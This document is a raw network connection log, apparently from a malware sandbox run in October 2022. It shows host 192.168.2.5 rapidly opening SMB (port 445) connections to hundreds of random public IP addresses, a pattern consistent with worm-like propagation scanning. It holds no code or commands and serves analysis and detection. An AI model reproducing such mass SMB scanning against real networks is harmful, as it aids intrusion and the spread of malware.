              Oct 10, 2022 17:17:58.026510000 CEST44552664172.65.204.21192.168.2.5
              Oct 10, 2022 17:17:58.026652098 CEST52664445192.168.2.5172.65.204.21
              Oct 10, 2022 17:17:58.026837111 CEST52664445192.168.2.5172.65.204.21
              Oct 10, 2022 17:17:58.027173996 CEST52665445192.168.2.5172.65.204.21
              Oct 10, 2022 17:17:58.044655085 CEST44552665172.65.204.21192.168.2.5
              Oct 10, 2022 17:17:58.045197964 CEST44552664172.65.204.21192.168.2.5
              Oct 10, 2022 17:17:58.046586990 CEST52665445192.168.2.5172.65.204.21
              Oct 10, 2022 17:17:58.046653032 CEST52665445192.168.2.5172.65.204.21
              Oct 10, 2022 17:17:58.056138992 CEST44552664172.65.204.21192.168.2.5
              Oct 10, 2022 17:17:58.063677073 CEST44552665172.65.204.21192.168.2.5
              Oct 10, 2022 17:17:58.065011024 CEST44552665172.65.204.21192.168.2.5
              Oct 10, 2022 17:17:58.108930111 CEST52639445192.168.2.576.91.230.254
              Oct 10, 2022 17:17:58.162941933 CEST804969593.184.220.29192.168.2.5
              Oct 10, 2022 17:17:58.163073063 CEST4969580192.168.2.593.184.220.29
              Oct 10, 2022 17:17:58.323436022 CEST4455263976.91.230.254192.168.2.5
              Oct 10, 2022 17:17:58.463442087 CEST52668445192.168.2.5135.125.37.114
              Oct 10, 2022 17:17:58.473993063 CEST52670445192.168.2.5184.31.186.183
              Oct 10, 2022 17:17:58.475131989 CEST52671445192.168.2.5146.49.35.174
              Oct 10, 2022 17:17:58.475164890 CEST52672445192.168.2.5138.169.221.53
              Oct 10, 2022 17:17:58.475229979 CEST52673445192.168.2.5101.121.40.112
              Oct 10, 2022 17:17:58.489885092 CEST52674445192.168.2.529.113.201.39
              Oct 10, 2022 17:17:58.489991903 CEST52675445192.168.2.5147.169.157.105
              Oct 10, 2022 17:17:58.493586063 CEST44552668135.125.37.114192.168.2.5
              Oct 10, 2022 17:17:58.506661892 CEST52676445192.168.2.5178.116.152.36
              Oct 10, 2022 17:17:58.506911993 CEST52679445192.168.2.582.46.15.148
              Oct 10, 2022 17:17:58.506995916 CEST52680445192.168.2.5196.183.243.120
              Oct 10, 2022 17:17:58.507220984 CEST52683445192.168.2.5193.7.203.31
              Oct 10, 2022 17:17:58.507297039 CEST52684445192.168.2.577.50.14.117
              Oct 10, 2022 17:17:58.507392883 CEST52685445192.168.2.5141.8.88.105
              Oct 10, 2022 17:17:58.507616043 CEST52688445192.168.2.5170.38.170.139
              Oct 10, 2022 17:17:58.507705927 CEST52689445192.168.2.5104.250.191.243
              Oct 10, 2022 17:17:58.507781029 CEST52690445192.168.2.5173.118.242.238
              Oct 10, 2022 17:17:58.507860899 CEST52691445192.168.2.5214.222.214.12
              Oct 10, 2022 17:17:58.507987022 CEST52692445192.168.2.515.160.107.115
              Oct 10, 2022 17:17:58.531379938 CEST52693445192.168.2.5167.246.183.238
              Oct 10, 2022 17:17:58.531538010 CEST52695445192.168.2.556.181.145.21
              Oct 10, 2022 17:17:58.531683922 CEST52698445192.168.2.5155.138.184.148
              Oct 10, 2022 17:17:58.531716108 CEST52697445192.168.2.5164.0.16.164
              Oct 10, 2022 17:17:58.531810999 CEST52699445192.168.2.583.70.35.37
              Oct 10, 2022 17:17:58.531847000 CEST52700445192.168.2.562.248.41.93
              Oct 10, 2022 17:17:58.575011015 CEST52702445192.168.2.5115.193.239.180
              Oct 10, 2022 17:17:58.575354099 CEST52703445192.168.2.5120.204.72.50
              Oct 10, 2022 17:17:58.575690985 CEST52705445192.168.2.579.138.88.29
              Oct 10, 2022 17:17:58.577141047 CEST52715445192.168.2.555.83.125.248
              Oct 10, 2022 17:17:58.577920914 CEST52716445192.168.2.5209.120.183.226
              Oct 10, 2022 17:17:58.578716040 CEST52717445192.168.2.5196.251.110.187
              Oct 10, 2022 17:17:59.070398092 CEST52668445192.168.2.5135.125.37.114
              Oct 10, 2022 17:17:59.100732088 CEST44552668135.125.37.114192.168.2.5
              Oct 10, 2022 17:17:59.572832108 CEST52723445192.168.2.523.127.237.71
              Oct 10, 2022 17:17:59.604156017 CEST52725445192.168.2.5149.193.102.81
              Oct 10, 2022 17:17:59.604830027 CEST52726445192.168.2.537.44.224.161
              Oct 10, 2022 17:17:59.605477095 CEST52727445192.168.2.5132.24.39.67
              Oct 10, 2022 17:17:59.605696917 CEST52728445192.168.2.5205.244.217.38
              Oct 10, 2022 17:17:59.619613886 CEST52729445192.168.2.525.233.81.215
              Oct 10, 2022 17:17:59.619740963 CEST52730445192.168.2.573.99.13.112
              Oct 10, 2022 17:17:59.635111094 CEST52731445192.168.2.567.138.171.197
              Oct 10, 2022 17:17:59.635303020 CEST52734445192.168.2.5216.22.29.41
              Oct 10, 2022 17:17:59.635370970 CEST52735445192.168.2.523.111.172.93
              Oct 10, 2022 17:17:59.635535002 CEST52739445192.168.2.5145.147.234.213
              Oct 10, 2022 17:17:59.635540962 CEST52738445192.168.2.5217.233.104.78
              Oct 10, 2022 17:17:59.635627985 CEST52740445192.168.2.574.237.91.70
              Oct 10, 2022 17:17:59.635729074 CEST52743445192.168.2.5170.90.41.32
              Oct 10, 2022 17:17:59.635817051 CEST52744445192.168.2.543.150.178.215
              Oct 10, 2022 17:17:59.635915995 CEST52746445192.168.2.582.26.47.198
              Oct 10, 2022 17:17:59.635915995 CEST52745445192.168.2.582.210.144.138
              Oct 10, 2022 17:17:59.635946035 CEST52747445192.168.2.526.214.44.227
              Oct 10, 2022 17:17:59.657255888 CEST52750445192.168.2.5159.87.4.245
              Oct 10, 2022 17:17:59.657324076 CEST52751445192.168.2.5154.179.228.4
              Oct 10, 2022 17:17:59.657396078 CEST52752445192.168.2.5174.120.238.227
              Oct 10, 2022 17:17:59.657593012 CEST52756445192.168.2.5153.4.33.117
              Oct 10, 2022 17:17:59.658598900 CEST52749445192.168.2.5110.127.9.204
              Oct 10, 2022 17:17:59.658598900 CEST52754445192.168.2.532.65.218.54
              Oct 10, 2022 17:17:59.704493999 CEST52757445192.168.2.590.79.31.191
              Oct 10, 2022 17:17:59.704725027 CEST52758445192.168.2.561.8.196.79
              Oct 10, 2022 17:17:59.704859018 CEST52759445192.168.2.554.216.170.248
              Oct 10, 2022 17:17:59.704988956 CEST52760445192.168.2.5139.35.179.12
              Oct 10, 2022 17:17:59.705966949 CEST52770445192.168.2.5155.107.137.12
              Oct 10, 2022 17:17:59.706634998 CEST52771445192.168.2.5219.225.184.240
              Oct 10, 2022 17:17:59.707438946 CEST52773445192.168.2.52.236.192.161
              Oct 10, 2022 17:18:00.708338022 CEST52778445192.168.2.5163.62.227.201
              Oct 10, 2022 17:18:00.721652985 CEST52781445192.168.2.537.134.248.95
              Oct 10, 2022 17:18:00.721653938 CEST52780445192.168.2.5114.191.86.155
              Oct 10, 2022 17:18:00.721772909 CEST52782445192.168.2.5195.216.215.35
              Oct 10, 2022 17:18:00.722923994 CEST52783445192.168.2.5189.243.94.129
              Oct 10, 2022 17:18:00.722965002 CEST52784445192.168.2.5209.170.40.241
              Oct 10, 2022 17:18:00.723129988 CEST52785445192.168.2.553.208.169.47
              Oct 10, 2022 17:18:00.753492117 CEST52786445192.168.2.5140.79.119.126
              Oct 10, 2022 17:18:00.753905058 CEST52789445192.168.2.544.72.13.238
              Oct 10, 2022 17:18:00.754044056 CEST52790445192.168.2.5120.236.63.45
              Oct 10, 2022 17:18:00.754823923 CEST52794445192.168.2.5210.130.239.10
              Oct 10, 2022 17:18:00.755278111 CEST52796445192.168.2.598.222.21.71
              Oct 10, 2022 17:18:00.755634069 CEST52798445192.168.2.523.96.62.120
              Oct 10, 2022 17:18:00.755831003 CEST52799445192.168.2.559.251.196.227
              Oct 10, 2022 17:18:00.756211042 CEST52801445192.168.2.5176.137.29.12
              Oct 10, 2022 17:18:00.756381989 CEST52802445192.168.2.566.174.160.132
              Oct 10, 2022 17:18:00.757237911 CEST52793445192.168.2.5172.183.252.192
              Oct 10, 2022 17:18:00.757237911 CEST52800445192.168.2.5222.208.151.3
              Oct 10, 2022 17:18:00.798063993 CEST52805445192.168.2.5198.248.2.46
              Oct 10, 2022 17:18:00.798063993 CEST52812445192.168.2.5118.206.223.89
              Oct 10, 2022 17:18:00.798073053 CEST52806445192.168.2.593.151.0.49
              Oct 10, 2022 17:18:00.798073053 CEST52811445192.168.2.5145.14.205.185
              Oct 10, 2022 17:18:00.798101902 CEST52809445192.168.2.5182.196.31.109
              Oct 10, 2022 17:18:00.798109055 CEST52807445192.168.2.5164.127.78.115
              Oct 10, 2022 17:18:00.860949039 CEST52813445192.168.2.5188.100.106.0
              Oct 10, 2022 17:18:00.861757040 CEST52815445192.168.2.5188.229.40.70
              Oct 10, 2022 17:18:00.862041950 CEST52816445192.168.2.59.13.118.102
              Oct 10, 2022 17:18:00.863058090 CEST52826445192.168.2.5178.30.46.67
              Oct 10, 2022 17:18:00.863212109 CEST52827445192.168.2.5181.70.109.145
              Oct 10, 2022 17:18:00.863349915 CEST52828445192.168.2.5205.223.116.68
              Oct 10, 2022 17:18:00.863996983 CEST52829445192.168.2.573.198.217.66
              Oct 10, 2022 17:18:01.006210089 CEST44552794210.130.239.10192.168.2.5
              Oct 10, 2022 17:18:01.071686029 CEST52831445192.168.2.5172.65.204.21
              Oct 10, 2022 17:18:01.088788033 CEST44552831172.65.204.21192.168.2.5
              Oct 10, 2022 17:18:01.088985920 CEST52831445192.168.2.5172.65.204.21
              Oct 10, 2022 17:18:01.088985920 CEST52831445192.168.2.5172.65.204.21
              Oct 10, 2022 17:18:01.105915070 CEST44552831172.65.204.21192.168.2.5
              Oct 10, 2022 17:18:01.106810093 CEST44552831172.65.204.21192.168.2.5
              Oct 10, 2022 17:18:01.170037031 CEST52832445192.168.2.5172.65.204.22
              Oct 10, 2022 17:18:01.187129021 CEST44552832172.65.204.22192.168.2.5
              Oct 10, 2022 17:18:01.187252998 CEST52832445192.168.2.5172.65.204.22
              Oct 10, 2022 17:18:01.187397957 CEST52832445192.168.2.5172.65.204.22
              Oct 10, 2022 17:18:01.187846899 CEST52833445192.168.2.5172.65.204.22
              Oct 10, 2022 17:18:01.204646111 CEST44552832172.65.204.22192.168.2.5
              Oct 10, 2022 17:18:01.204711914 CEST44552832172.65.204.22192.168.2.5
              Oct 10, 2022 17:18:01.204735994 CEST44552833172.65.204.22192.168.2.5
              Oct 10, 2022 17:18:01.204847097 CEST52833445192.168.2.5172.65.204.22
              Oct 10, 2022 17:18:01.204893112 CEST52833445192.168.2.5172.65.204.22
              Oct 10, 2022 17:18:01.221762896 CEST44552833172.65.204.22192.168.2.5
              Oct 10, 2022 17:18:01.222799063 CEST44552833172.65.204.22192.168.2.5
              Oct 10, 2022 17:18:01.508327961 CEST52794445192.168.2.5210.130.239.10
              Oct 10, 2022 17:18:01.761030912 CEST44552794210.130.239.10192.168.2.5
              Oct 10, 2022 17:18:01.825383902 CEST52838445192.168.2.551.211.128.59
              Oct 10, 2022 17:18:01.842447996 CEST52839445192.168.2.5111.163.243.105
              Oct 10, 2022 17:18:01.842633009 CEST52840445192.168.2.5193.142.211.95
              Oct 10, 2022 17:18:01.842683077 CEST52841445192.168.2.5113.223.157.237
              Oct 10, 2022 17:18:01.844048023 CEST52842445192.168.2.541.161.149.247
              Oct 10, 2022 17:18:01.844325066 CEST52843445192.168.2.5128.227.4.60
              Oct 10, 2022 17:18:01.844413042 CEST52844445192.168.2.5221.4.247.24
              Oct 10, 2022 17:18:01.872589111 CEST52846445192.168.2.5100.172.135.183
              Oct 10, 2022 17:18:01.872697115 CEST52847445192.168.2.5140.34.91.120
              Oct 10, 2022 17:18:01.872791052 CEST52848445192.168.2.5189.183.245.251
              Oct 10, 2022 17:18:01.872868061 CEST52849445192.168.2.5112.190.156.38
              Oct 10, 2022 17:18:01.872951031 CEST52850445192.168.2.578.78.64.64
              Oct 10, 2022 17:18:01.873184919 CEST52852445192.168.2.5142.38.51.248
              Oct 10, 2022 17:18:01.873275042 CEST52854445192.168.2.5139.27.231.31
              Oct 10, 2022 17:18:01.873344898 CEST52855445192.168.2.511.180.189.76
              Oct 10, 2022 17:18:01.873604059 CEST52858445192.168.2.519.118.106.50
              Oct 10, 2022 17:18:01.873691082 CEST52859445192.168.2.535.28.46.118
              Oct 10, 2022 17:18:01.873946905 CEST52862445192.168.2.544.102.216.3
              Oct 10, 2022 17:18:01.910537958 CEST52864445192.168.2.539.215.4.23
              Oct 10, 2022 17:18:01.910708904 CEST52865445192.168.2.5181.226.169.239
              Oct 10, 2022 17:18:01.910773993 CEST52866445192.168.2.5147.254.123.194
              Oct 10, 2022 17:18:01.910933971 CEST52868445192.168.2.55.157.145.239
              Oct 10, 2022 17:18:01.911123037 CEST52870445192.168.2.511.212.35.152
              Oct 10, 2022 17:18:01.911200047 CEST52871445192.168.2.587.180.20.37
              Oct 10, 2022 17:18:01.939573050 CEST4455287187.180.20.37192.168.2.5
              Oct 10, 2022 17:18:01.972224951 CEST52872445192.168.2.545.58.36.38
              Oct 10, 2022 17:18:01.972398996 CEST52873445192.168.2.5119.219.245.99
              Oct 10, 2022 17:18:01.972721100 CEST52874445192.168.2.5143.114.127.68
              Oct 10, 2022 17:18:01.973361015 CEST52875445192.168.2.572.149.25.202
              Oct 10, 2022 17:18:01.973361015 CEST52885445192.168.2.5126.241.45.227
              Oct 10, 2022 17:18:01.974311113 CEST52887445192.168.2.5135.32.147.46
              Oct 10, 2022 17:18:01.974500895 CEST52888445192.168.2.5209.93.142.102
              Oct 10, 2022 17:18:02.085279942 CEST4455287245.58.36.38192.168.2.5
              Oct 10, 2022 17:18:02.161464930 CEST44552865181.226.169.239192.168.2.5
              Oct 10, 2022 17:18:02.263174057 CEST44552885126.241.45.227192.168.2.5
              Oct 10, 2022 17:18:02.442214012 CEST52871445192.168.2.587.180.20.37
              Oct 10, 2022 17:18:02.470624924 CEST4455287187.180.20.37192.168.2.5
              Oct 10, 2022 17:18:02.589337111 CEST52872445192.168.2.545.58.36.38
              Oct 10, 2022 17:18:02.683121920 CEST52865445192.168.2.5181.226.169.239
              Oct 10, 2022 17:18:02.702348948 CEST4455287245.58.36.38192.168.2.5
              Oct 10, 2022 17:18:02.777174950 CEST52885445192.168.2.5126.241.45.227
              Oct 10, 2022 17:18:02.933700085 CEST44552865181.226.169.239192.168.2.5
              Oct 10, 2022 17:18:02.953239918 CEST52894445192.168.2.526.163.57.60
              Oct 10, 2022 17:18:02.964782000 CEST52896445192.168.2.5142.220.231.233
              Oct 10, 2022 17:18:02.964905977 CEST52898445192.168.2.542.143.89.13
              Oct 10, 2022 17:18:02.964930058 CEST52897445192.168.2.542.9.142.18
              Oct 10, 2022 17:18:02.966171026 CEST52899445192.168.2.53.70.88.183
              Oct 10, 2022 17:18:02.966321945 CEST52900445192.168.2.584.230.143.113
              Oct 10, 2022 17:18:02.966484070 CEST52901445192.168.2.532.133.24.151
              Oct 10, 2022 17:18:02.998358965 CEST52902445192.168.2.5214.59.47.98
              Oct 10, 2022 17:18:02.998586893 CEST52905445192.168.2.529.190.94.196
              Oct 10, 2022 17:18:03.000113964 CEST52906445192.168.2.513.126.247.187
              Oct 10, 2022 17:18:03.000412941 CEST52909445192.168.2.5164.108.26.196
              Oct 10, 2022 17:18:03.000622034 CEST52910445192.168.2.5145.97.202.12
              Oct 10, 2022 17:18:03.000796080 CEST52912445192.168.2.5202.112.142.32
              Oct 10, 2022 17:18:03.000961065 CEST52914445192.168.2.55.201.156.55
              Oct 10, 2022 17:18:03.001136065 CEST52916445192.168.2.561.133.67.180
              Oct 10, 2022 17:18:03.001221895 CEST52917445192.168.2.555.124.77.45
              Oct 10, 2022 17:18:03.001553059 CEST52918445192.168.2.5215.248.34.224
              Oct 10, 2022 17:18:03.031253099 CEST52921445192.168.2.5222.165.10.107
              Oct 10, 2022 17:18:03.031352997 CEST52922445192.168.2.5142.216.24.241
              Oct 10, 2022 17:18:03.031491041 CEST52923445192.168.2.549.249.47.6
              Oct 10, 2022 17:18:03.031657934 CEST52925445192.168.2.5153.80.159.94
              Oct 10, 2022 17:18:03.031811953 CEST52927445192.168.2.5102.2.90.243
              Oct 10, 2022 17:18:03.031889915 CEST52928445192.168.2.534.250.242.221
              Oct 10, 2022 17:18:03.066924095 CEST44552885126.241.45.227192.168.2.5
              Oct 10, 2022 17:18:03.090390921 CEST52930445192.168.2.531.186.92.164
              Oct 10, 2022 17:18:03.091080904 CEST52931445192.168.2.529.54.199.108
              Oct 10, 2022 17:18:03.091213942 CEST52932445192.168.2.573.3.111.199
              Oct 10, 2022 17:18:03.091377974 CEST52933445192.168.2.53.162.12.30
              Oct 10, 2022 17:18:03.091566086 CEST52934445192.168.2.516.100.160.168
              Oct 10, 2022 17:18:03.092001915 CEST52935445192.168.2.587.31.136.37
              Oct 10, 2022 17:18:03.093216896 CEST52945445192.168.2.5220.172.147.32
              Oct 10, 2022 17:18:03.133209944 CEST4455290613.126.247.187192.168.2.5
              Oct 10, 2022 17:18:03.636375904 CEST52906445192.168.2.513.126.247.187
              Oct 10, 2022 17:18:03.771168947 CEST4455290613.126.247.187192.168.2.5
              Oct 10, 2022 17:18:04.060729980 CEST52952445192.168.2.562.113.48.204
              Oct 10, 2022 17:18:04.074165106 CEST52953445192.168.2.5152.212.5.186
              Oct 10, 2022 17:18:04.074400902 CEST52954445192.168.2.562.71.163.250
              Oct 10, 2022 17:18:04.074620008 CEST52955445192.168.2.5155.246.50.154
              Oct 10, 2022 17:18:04.075208902 CEST52956445192.168.2.530.220.215.118
              Oct 10, 2022 17:18:04.075660944 CEST52957445192.168.2.5136.140.120.135
              Oct 10, 2022 17:18:04.076245070 CEST52958445192.168.2.599.212.123.129
              Oct 10, 2022 17:18:04.106158018 CEST52960445192.168.2.510.169.172.117
              Oct 10, 2022 17:18:04.106328011 CEST52962445192.168.2.589.18.145.33
              Oct 10, 2022 17:18:04.106414080 CEST52963445192.168.2.541.38.32.149
              Oct 10, 2022 17:18:04.106595039 CEST52967445192.168.2.546.166.172.62
              Oct 10, 2022 17:18:04.106750965 CEST52966445192.168.2.5205.177.170.79
              Oct 10, 2022 17:18:04.106811047 CEST52969445192.168.2.5171.59.20.162
              Oct 10, 2022 17:18:04.106842041 CEST52971445192.168.2.5171.162.25.28
              Oct 10, 2022 17:18:04.106918097 CEST52972445192.168.2.5121.183.57.120
              Oct 10, 2022 17:18:04.106986046 CEST52973445192.168.2.5168.238.106.1
              Oct 10, 2022 17:18:04.107211113 CEST52974445192.168.2.5150.186.88.193
              Oct 10, 2022 17:18:04.121037960 CEST52975445192.168.2.5160.90.107.21
              Oct 10, 2022 17:18:04.137083054 CEST52977445192.168.2.5223.23.229.118
              Oct 10, 2022 17:18:04.137378931 CEST52978445192.168.2.585.36.17.110
              Oct 10, 2022 17:18:04.137427092 CEST52982445192.168.2.5187.58.59.174
              Oct 10, 2022 17:18:04.137495995 CEST52981445192.168.2.5120.196.134.27
              Oct 10, 2022 17:18:04.137784004 CEST52983445192.168.2.5105.58.35.168
              Oct 10, 2022 17:18:04.137787104 CEST52984445192.168.2.5168.227.141.193
              Oct 10, 2022 17:18:04.219238043 CEST52986445192.168.2.5220.51.199.149
              Oct 10, 2022 17:18:04.219834089 CEST52988445192.168.2.566.100.42.193
              Oct 10, 2022 17:18:04.219964981 CEST52989445192.168.2.543.44.219.142
              Oct 10, 2022 17:18:04.220155001 CEST52990445192.168.2.5117.33.19.95
              Oct 10, 2022 17:18:04.220197916 CEST52991445192.168.2.528.14.227.45
              Oct 10, 2022 17:18:04.220772028 CEST52997445192.168.2.5155.111.25.239
              Oct 10, 2022 17:18:04.220957041 CEST53001445192.168.2.5204.165.168.50
              Oct 10, 2022 17:18:04.230420113 CEST53003445192.168.2.5172.65.204.22
              Oct 10, 2022 17:18:04.247452974 CEST44553003172.65.204.22192.168.2.5
              Oct 10, 2022 17:18:04.247570992 CEST53003445192.168.2.5172.65.204.22
              Oct 10, 2022 17:18:04.247739077 CEST53003445192.168.2.5172.65.204.22
              Oct 10, 2022 17:18:04.264816999 CEST44553003172.65.204.22192.168.2.5
              Oct 10, 2022 17:18:04.266449928 CEST44553003172.65.204.22192.168.2.5
              Oct 10, 2022 17:18:04.332565069 CEST53004445192.168.2.5172.65.204.23
              Oct 10, 2022 17:18:04.349715948 CEST44553004172.65.204.23192.168.2.5
              Oct 10, 2022 17:18:04.350658894 CEST53004445192.168.2.5172.65.204.23
              Oct 10, 2022 17:18:04.350661039 CEST53006445192.168.2.5172.65.204.23
              Oct 10, 2022 17:18:04.350660086 CEST53004445192.168.2.5172.65.204.23
              Oct 10, 2022 17:18:04.367993116 CEST44553006172.65.204.23192.168.2.5
              Oct 10, 2022 17:18:04.368207932 CEST53006445192.168.2.5172.65.204.23
              Oct 10, 2022 17:18:04.368271112 CEST53006445192.168.2.5172.65.204.23
              Oct 10, 2022 17:18:04.369049072 CEST44553004172.65.204.23192.168.2.5
              Oct 10, 2022 17:18:04.386111021 CEST44553006172.65.204.23192.168.2.5
              Oct 10, 2022 17:18:04.386188030 CEST44553006172.65.204.23192.168.2.5
              Oct 10, 2022 17:18:05.199552059 CEST53012445192.168.2.559.24.82.218
              Oct 10, 2022 17:18:05.199917078 CEST53014445192.168.2.591.68.186.110
              Oct 10, 2022 17:18:05.200095892 CEST53015445192.168.2.5186.208.211.230
              Oct 10, 2022 17:18:05.200177908 CEST53016445192.168.2.582.24.83.51
              Oct 10, 2022 17:18:05.200743914 CEST53017445192.168.2.589.250.43.16
              Oct 10, 2022 17:18:05.201282024 CEST53018445192.168.2.571.33.189.137
              Oct 10, 2022 17:18:05.201845884 CEST53019445192.168.2.557.226.214.131
              Oct 10, 2022 17:18:05.231128931 CEST53020445192.168.2.5186.242.229.0
              Oct 10, 2022 17:18:05.231235981 CEST53021445192.168.2.5148.68.227.196
              Oct 10, 2022 17:18:05.231300116 CEST53023445192.168.2.5198.65.89.245
              Oct 10, 2022 17:18:05.231430054 CEST53025445192.168.2.515.140.9.42
              Oct 10, 2022 17:18:05.231513023 CEST53026445192.168.2.532.254.42.181
              Oct 10, 2022 17:18:05.231621027 CEST53028445192.168.2.575.234.159.191
              Oct 10, 2022 17:18:05.231800079 CEST53030445192.168.2.5191.142.239.223
              Oct 10, 2022 17:18:05.231895924 CEST53032445192.168.2.5118.197.38.192
              Oct 10, 2022 17:18:05.231961012 CEST53033445192.168.2.5200.130.116.46
              Oct 10, 2022 17:18:05.232055902 CEST53034445192.168.2.596.240.170.245
              Oct 10, 2022 17:18:05.232110023 CEST53035445192.168.2.5208.222.23.24
              Oct 10, 2022 17:18:05.267482042 CEST53039445192.168.2.5181.251.115.123
              Oct 10, 2022 17:18:05.267699957 CEST53040445192.168.2.5172.226.59.89
              Oct 10, 2022 17:18:05.267945051 CEST53041445192.168.2.5122.221.41.48
              Oct 10, 2022 17:18:05.268181086 CEST53042445192.168.2.571.201.157.213
              Oct 10, 2022 17:18:05.268735886 CEST53045445192.168.2.5107.46.34.124
              Oct 10, 2022 17:18:05.268876076 CEST53046445192.168.2.54.203.102.163
              Oct 10, 2022 17:18:05.340684891 CEST53047445192.168.2.5217.198.93.186
              Oct 10, 2022 17:18:05.341053009 CEST53049445192.168.2.5147.177.152.118
              Oct 10, 2022 17:18:05.341156960 CEST53050445192.168.2.511.136.40.17
              Oct 10, 2022 17:18:05.341269970 CEST53051445192.168.2.5152.134.241.111
              Oct 10, 2022 17:18:05.341645002 CEST53053445192.168.2.5195.83.155.77
              Oct 10, 2022 17:18:05.342226982 CEST53062445192.168.2.567.110.164.187
              Oct 10, 2022 17:18:05.342597008 CEST53063445192.168.2.5191.171.159.24
              Oct 10, 2022 17:18:06.308900118 CEST53070445192.168.2.5182.111.15.51
              Oct 10, 2022 17:18:06.309057951 CEST53071445192.168.2.5187.125.212.245
              Oct 10, 2022 17:18:06.309154034 CEST53072445192.168.2.5170.15.173.190
              Oct 10, 2022 17:18:06.311697006 CEST53074445192.168.2.546.162.43.209
              Oct 10, 2022 17:18:06.311855078 CEST53076445192.168.2.5202.1.12.240
              Oct 10, 2022 17:18:06.311877012 CEST53075445192.168.2.561.112.26.184
              Oct 10, 2022 17:18:06.312022924 CEST53077445192.168.2.5173.67.185.106
              Oct 10, 2022 17:18:06.440963984 CEST53078445192.168.2.5152.111.76.110
              Oct 10, 2022 17:18:06.441198111 CEST53080445192.168.2.5165.159.229.92
              Oct 10, 2022 17:18:06.441274881 CEST53081445192.168.2.5137.230.165.221
              Oct 10, 2022 17:18:06.441472054 CEST53083445192.168.2.511.174.26.147
              Oct 10, 2022 17:18:06.441546917 CEST53084445192.168.2.5212.174.57.150
              Oct 10, 2022 17:18:06.441627979 CEST53085445192.168.2.5142.197.238.249
              Oct 10, 2022 17:18:06.442069054 CEST53089445192.168.2.5182.150.39.246
              Oct 10, 2022 17:18:06.442287922 CEST53090445192.168.2.5139.38.221.73
              Oct 10, 2022 17:18:06.442344904 CEST53091445192.168.2.5194.54.29.184
              Oct 10, 2022 17:18:06.442465067 CEST53092445192.168.2.5193.131.37.217
              Oct 10, 2022 17:18:06.442620993 CEST53094445192.168.2.512.177.247.149
              Oct 10, 2022 17:18:06.442931890 CEST53097445192.168.2.5126.149.193.237
              Oct 10, 2022 17:18:06.443104029 CEST53098445192.168.2.514.156.51.40
              Oct 10, 2022 17:18:06.443195105 CEST53099445192.168.2.5138.44.254.198
              Oct 10, 2022 17:18:06.443288088 CEST53100445192.168.2.5166.168.245.152
              Oct 10, 2022 17:18:06.443509102 CEST53103445192.168.2.577.131.150.59
              Oct 10, 2022 17:18:06.443603039 CEST53104445192.168.2.5162.253.32.236
              Oct 10, 2022 17:18:06.456691980 CEST53105445192.168.2.5178.89.30.193
              Oct 10, 2022 17:18:06.457009077 CEST53107445192.168.2.524.52.109.6
              Oct 10, 2022 17:18:06.457052946 CEST53108445192.168.2.585.44.54.187
              Oct 10, 2022 17:18:06.457129955 CEST53109445192.168.2.553.111.181.85
              Oct 10, 2022 17:18:06.457663059 CEST53117445192.168.2.56.85.124.1
              Oct 10, 2022 17:18:06.457721949 CEST53120445192.168.2.5203.182.138.197
              Oct 10, 2022 17:18:06.458180904 CEST53121445192.168.2.5216.67.64.161
              Oct 10, 2022 17:18:07.402561903 CEST53129445192.168.2.5172.65.204.23
              Oct 10, 2022 17:18:07.419684887 CEST44553129172.65.204.23192.168.2.5
              Oct 10, 2022 17:18:07.419862986 CEST53129445192.168.2.5172.65.204.23
              Oct 10, 2022 17:18:07.419986010 CEST53129445192.168.2.5172.65.204.23
              Oct 10, 2022 17:18:07.436965942 CEST44553129172.65.204.23192.168.2.5
              Oct 10, 2022 17:18:07.437997103 CEST44553129172.65.204.23192.168.2.5
              Oct 10, 2022 17:18:07.439203024 CEST53130445192.168.2.5153.191.200.7
              Oct 10, 2022 17:18:07.439707041 CEST53131445192.168.2.518.180.181.108
              Oct 10, 2022 17:18:07.440031052 CEST53132445192.168.2.5171.163.191.142
              Oct 10, 2022 17:18:07.442287922 CEST53134445192.168.2.5152.11.209.213
              Oct 10, 2022 17:18:07.444132090 CEST53135445192.168.2.5152.58.84.222
              Oct 10, 2022 17:18:07.444653034 CEST53136445192.168.2.584.181.235.239
              Oct 10, 2022 17:18:07.445333004 CEST53137445192.168.2.552.14.222.50
              Oct 10, 2022 17:18:07.886250019 CEST53138445192.168.2.5181.221.121.91
              Oct 10, 2022 17:18:07.886523962 CEST53140445192.168.2.533.16.65.192
              Oct 10, 2022 17:18:07.886820078 CEST53141445192.168.2.5117.39.115.111
              Oct 10, 2022 17:18:07.887181997 CEST53143445192.168.2.57.182.225.139
              Oct 10, 2022 17:18:07.887181997 CEST53144445192.168.2.551.45.119.86
              Oct 10, 2022 17:18:07.887257099 CEST53145445192.168.2.5186.156.123.114
              Oct 10, 2022 17:18:07.887541056 CEST53149445192.168.2.5187.29.217.24
              Oct 10, 2022 17:18:07.887640953 CEST53150445192.168.2.5170.65.137.49
              Oct 10, 2022 17:18:07.887722015 CEST53151445192.168.2.5186.15.119.254
              Oct 10, 2022 17:18:07.887882948 CEST53152445192.168.2.517.226.45.46
              Oct 10, 2022 17:18:07.888236046 CEST53154445192.168.2.5165.138.186.16
              Oct 10, 2022 17:18:07.888457060 CEST53157445192.168.2.535.5.39.37
              Oct 10, 2022 17:18:07.888540983 CEST53158445192.168.2.5109.69.13.207
              Oct 10, 2022 17:18:07.888626099 CEST53159445192.168.2.5173.44.216.3
              Oct 10, 2022 17:18:07.888897896 CEST53160445192.168.2.559.33.221.158
              Oct 10, 2022 17:18:07.889182091 CEST53163445192.168.2.5201.53.47.218
              Oct 10, 2022 17:18:07.889244080 CEST53164445192.168.2.5103.62.160.103
              Oct 10, 2022 17:18:07.889331102 CEST53165445192.168.2.5182.51.50.187
              Oct 10, 2022 17:18:07.889606953 CEST53166445192.168.2.5115.104.132.114
              Oct 10, 2022 17:18:07.889858961 CEST53167445192.168.2.582.244.17.49
              Oct 10, 2022 17:18:07.890052080 CEST53169445192.168.2.5130.85.190.108
              Oct 10, 2022 17:18:07.890141010 CEST53170445192.168.2.544.225.150.218
              Oct 10, 2022 17:18:07.890223026 CEST53171445192.168.2.5138.93.69.224
              Oct 10, 2022 17:18:07.891182899 CEST53181445192.168.2.547.80.198.243
              Oct 10, 2022 17:18:07.896950006 CEST53182445192.168.2.5172.65.204.24
              Oct 10, 2022 17:18:07.914063931 CEST44553182172.65.204.24192.168.2.5
              Oct 10, 2022 17:18:07.914167881 CEST53182445192.168.2.5172.65.204.24
              Oct 10, 2022 17:18:07.914318085 CEST53182445192.168.2.5172.65.204.24
              Oct 10, 2022 17:18:07.915226936 CEST53183445192.168.2.5172.65.204.24
              Oct 10, 2022 17:18:07.932079077 CEST44553182172.65.204.24192.168.2.5
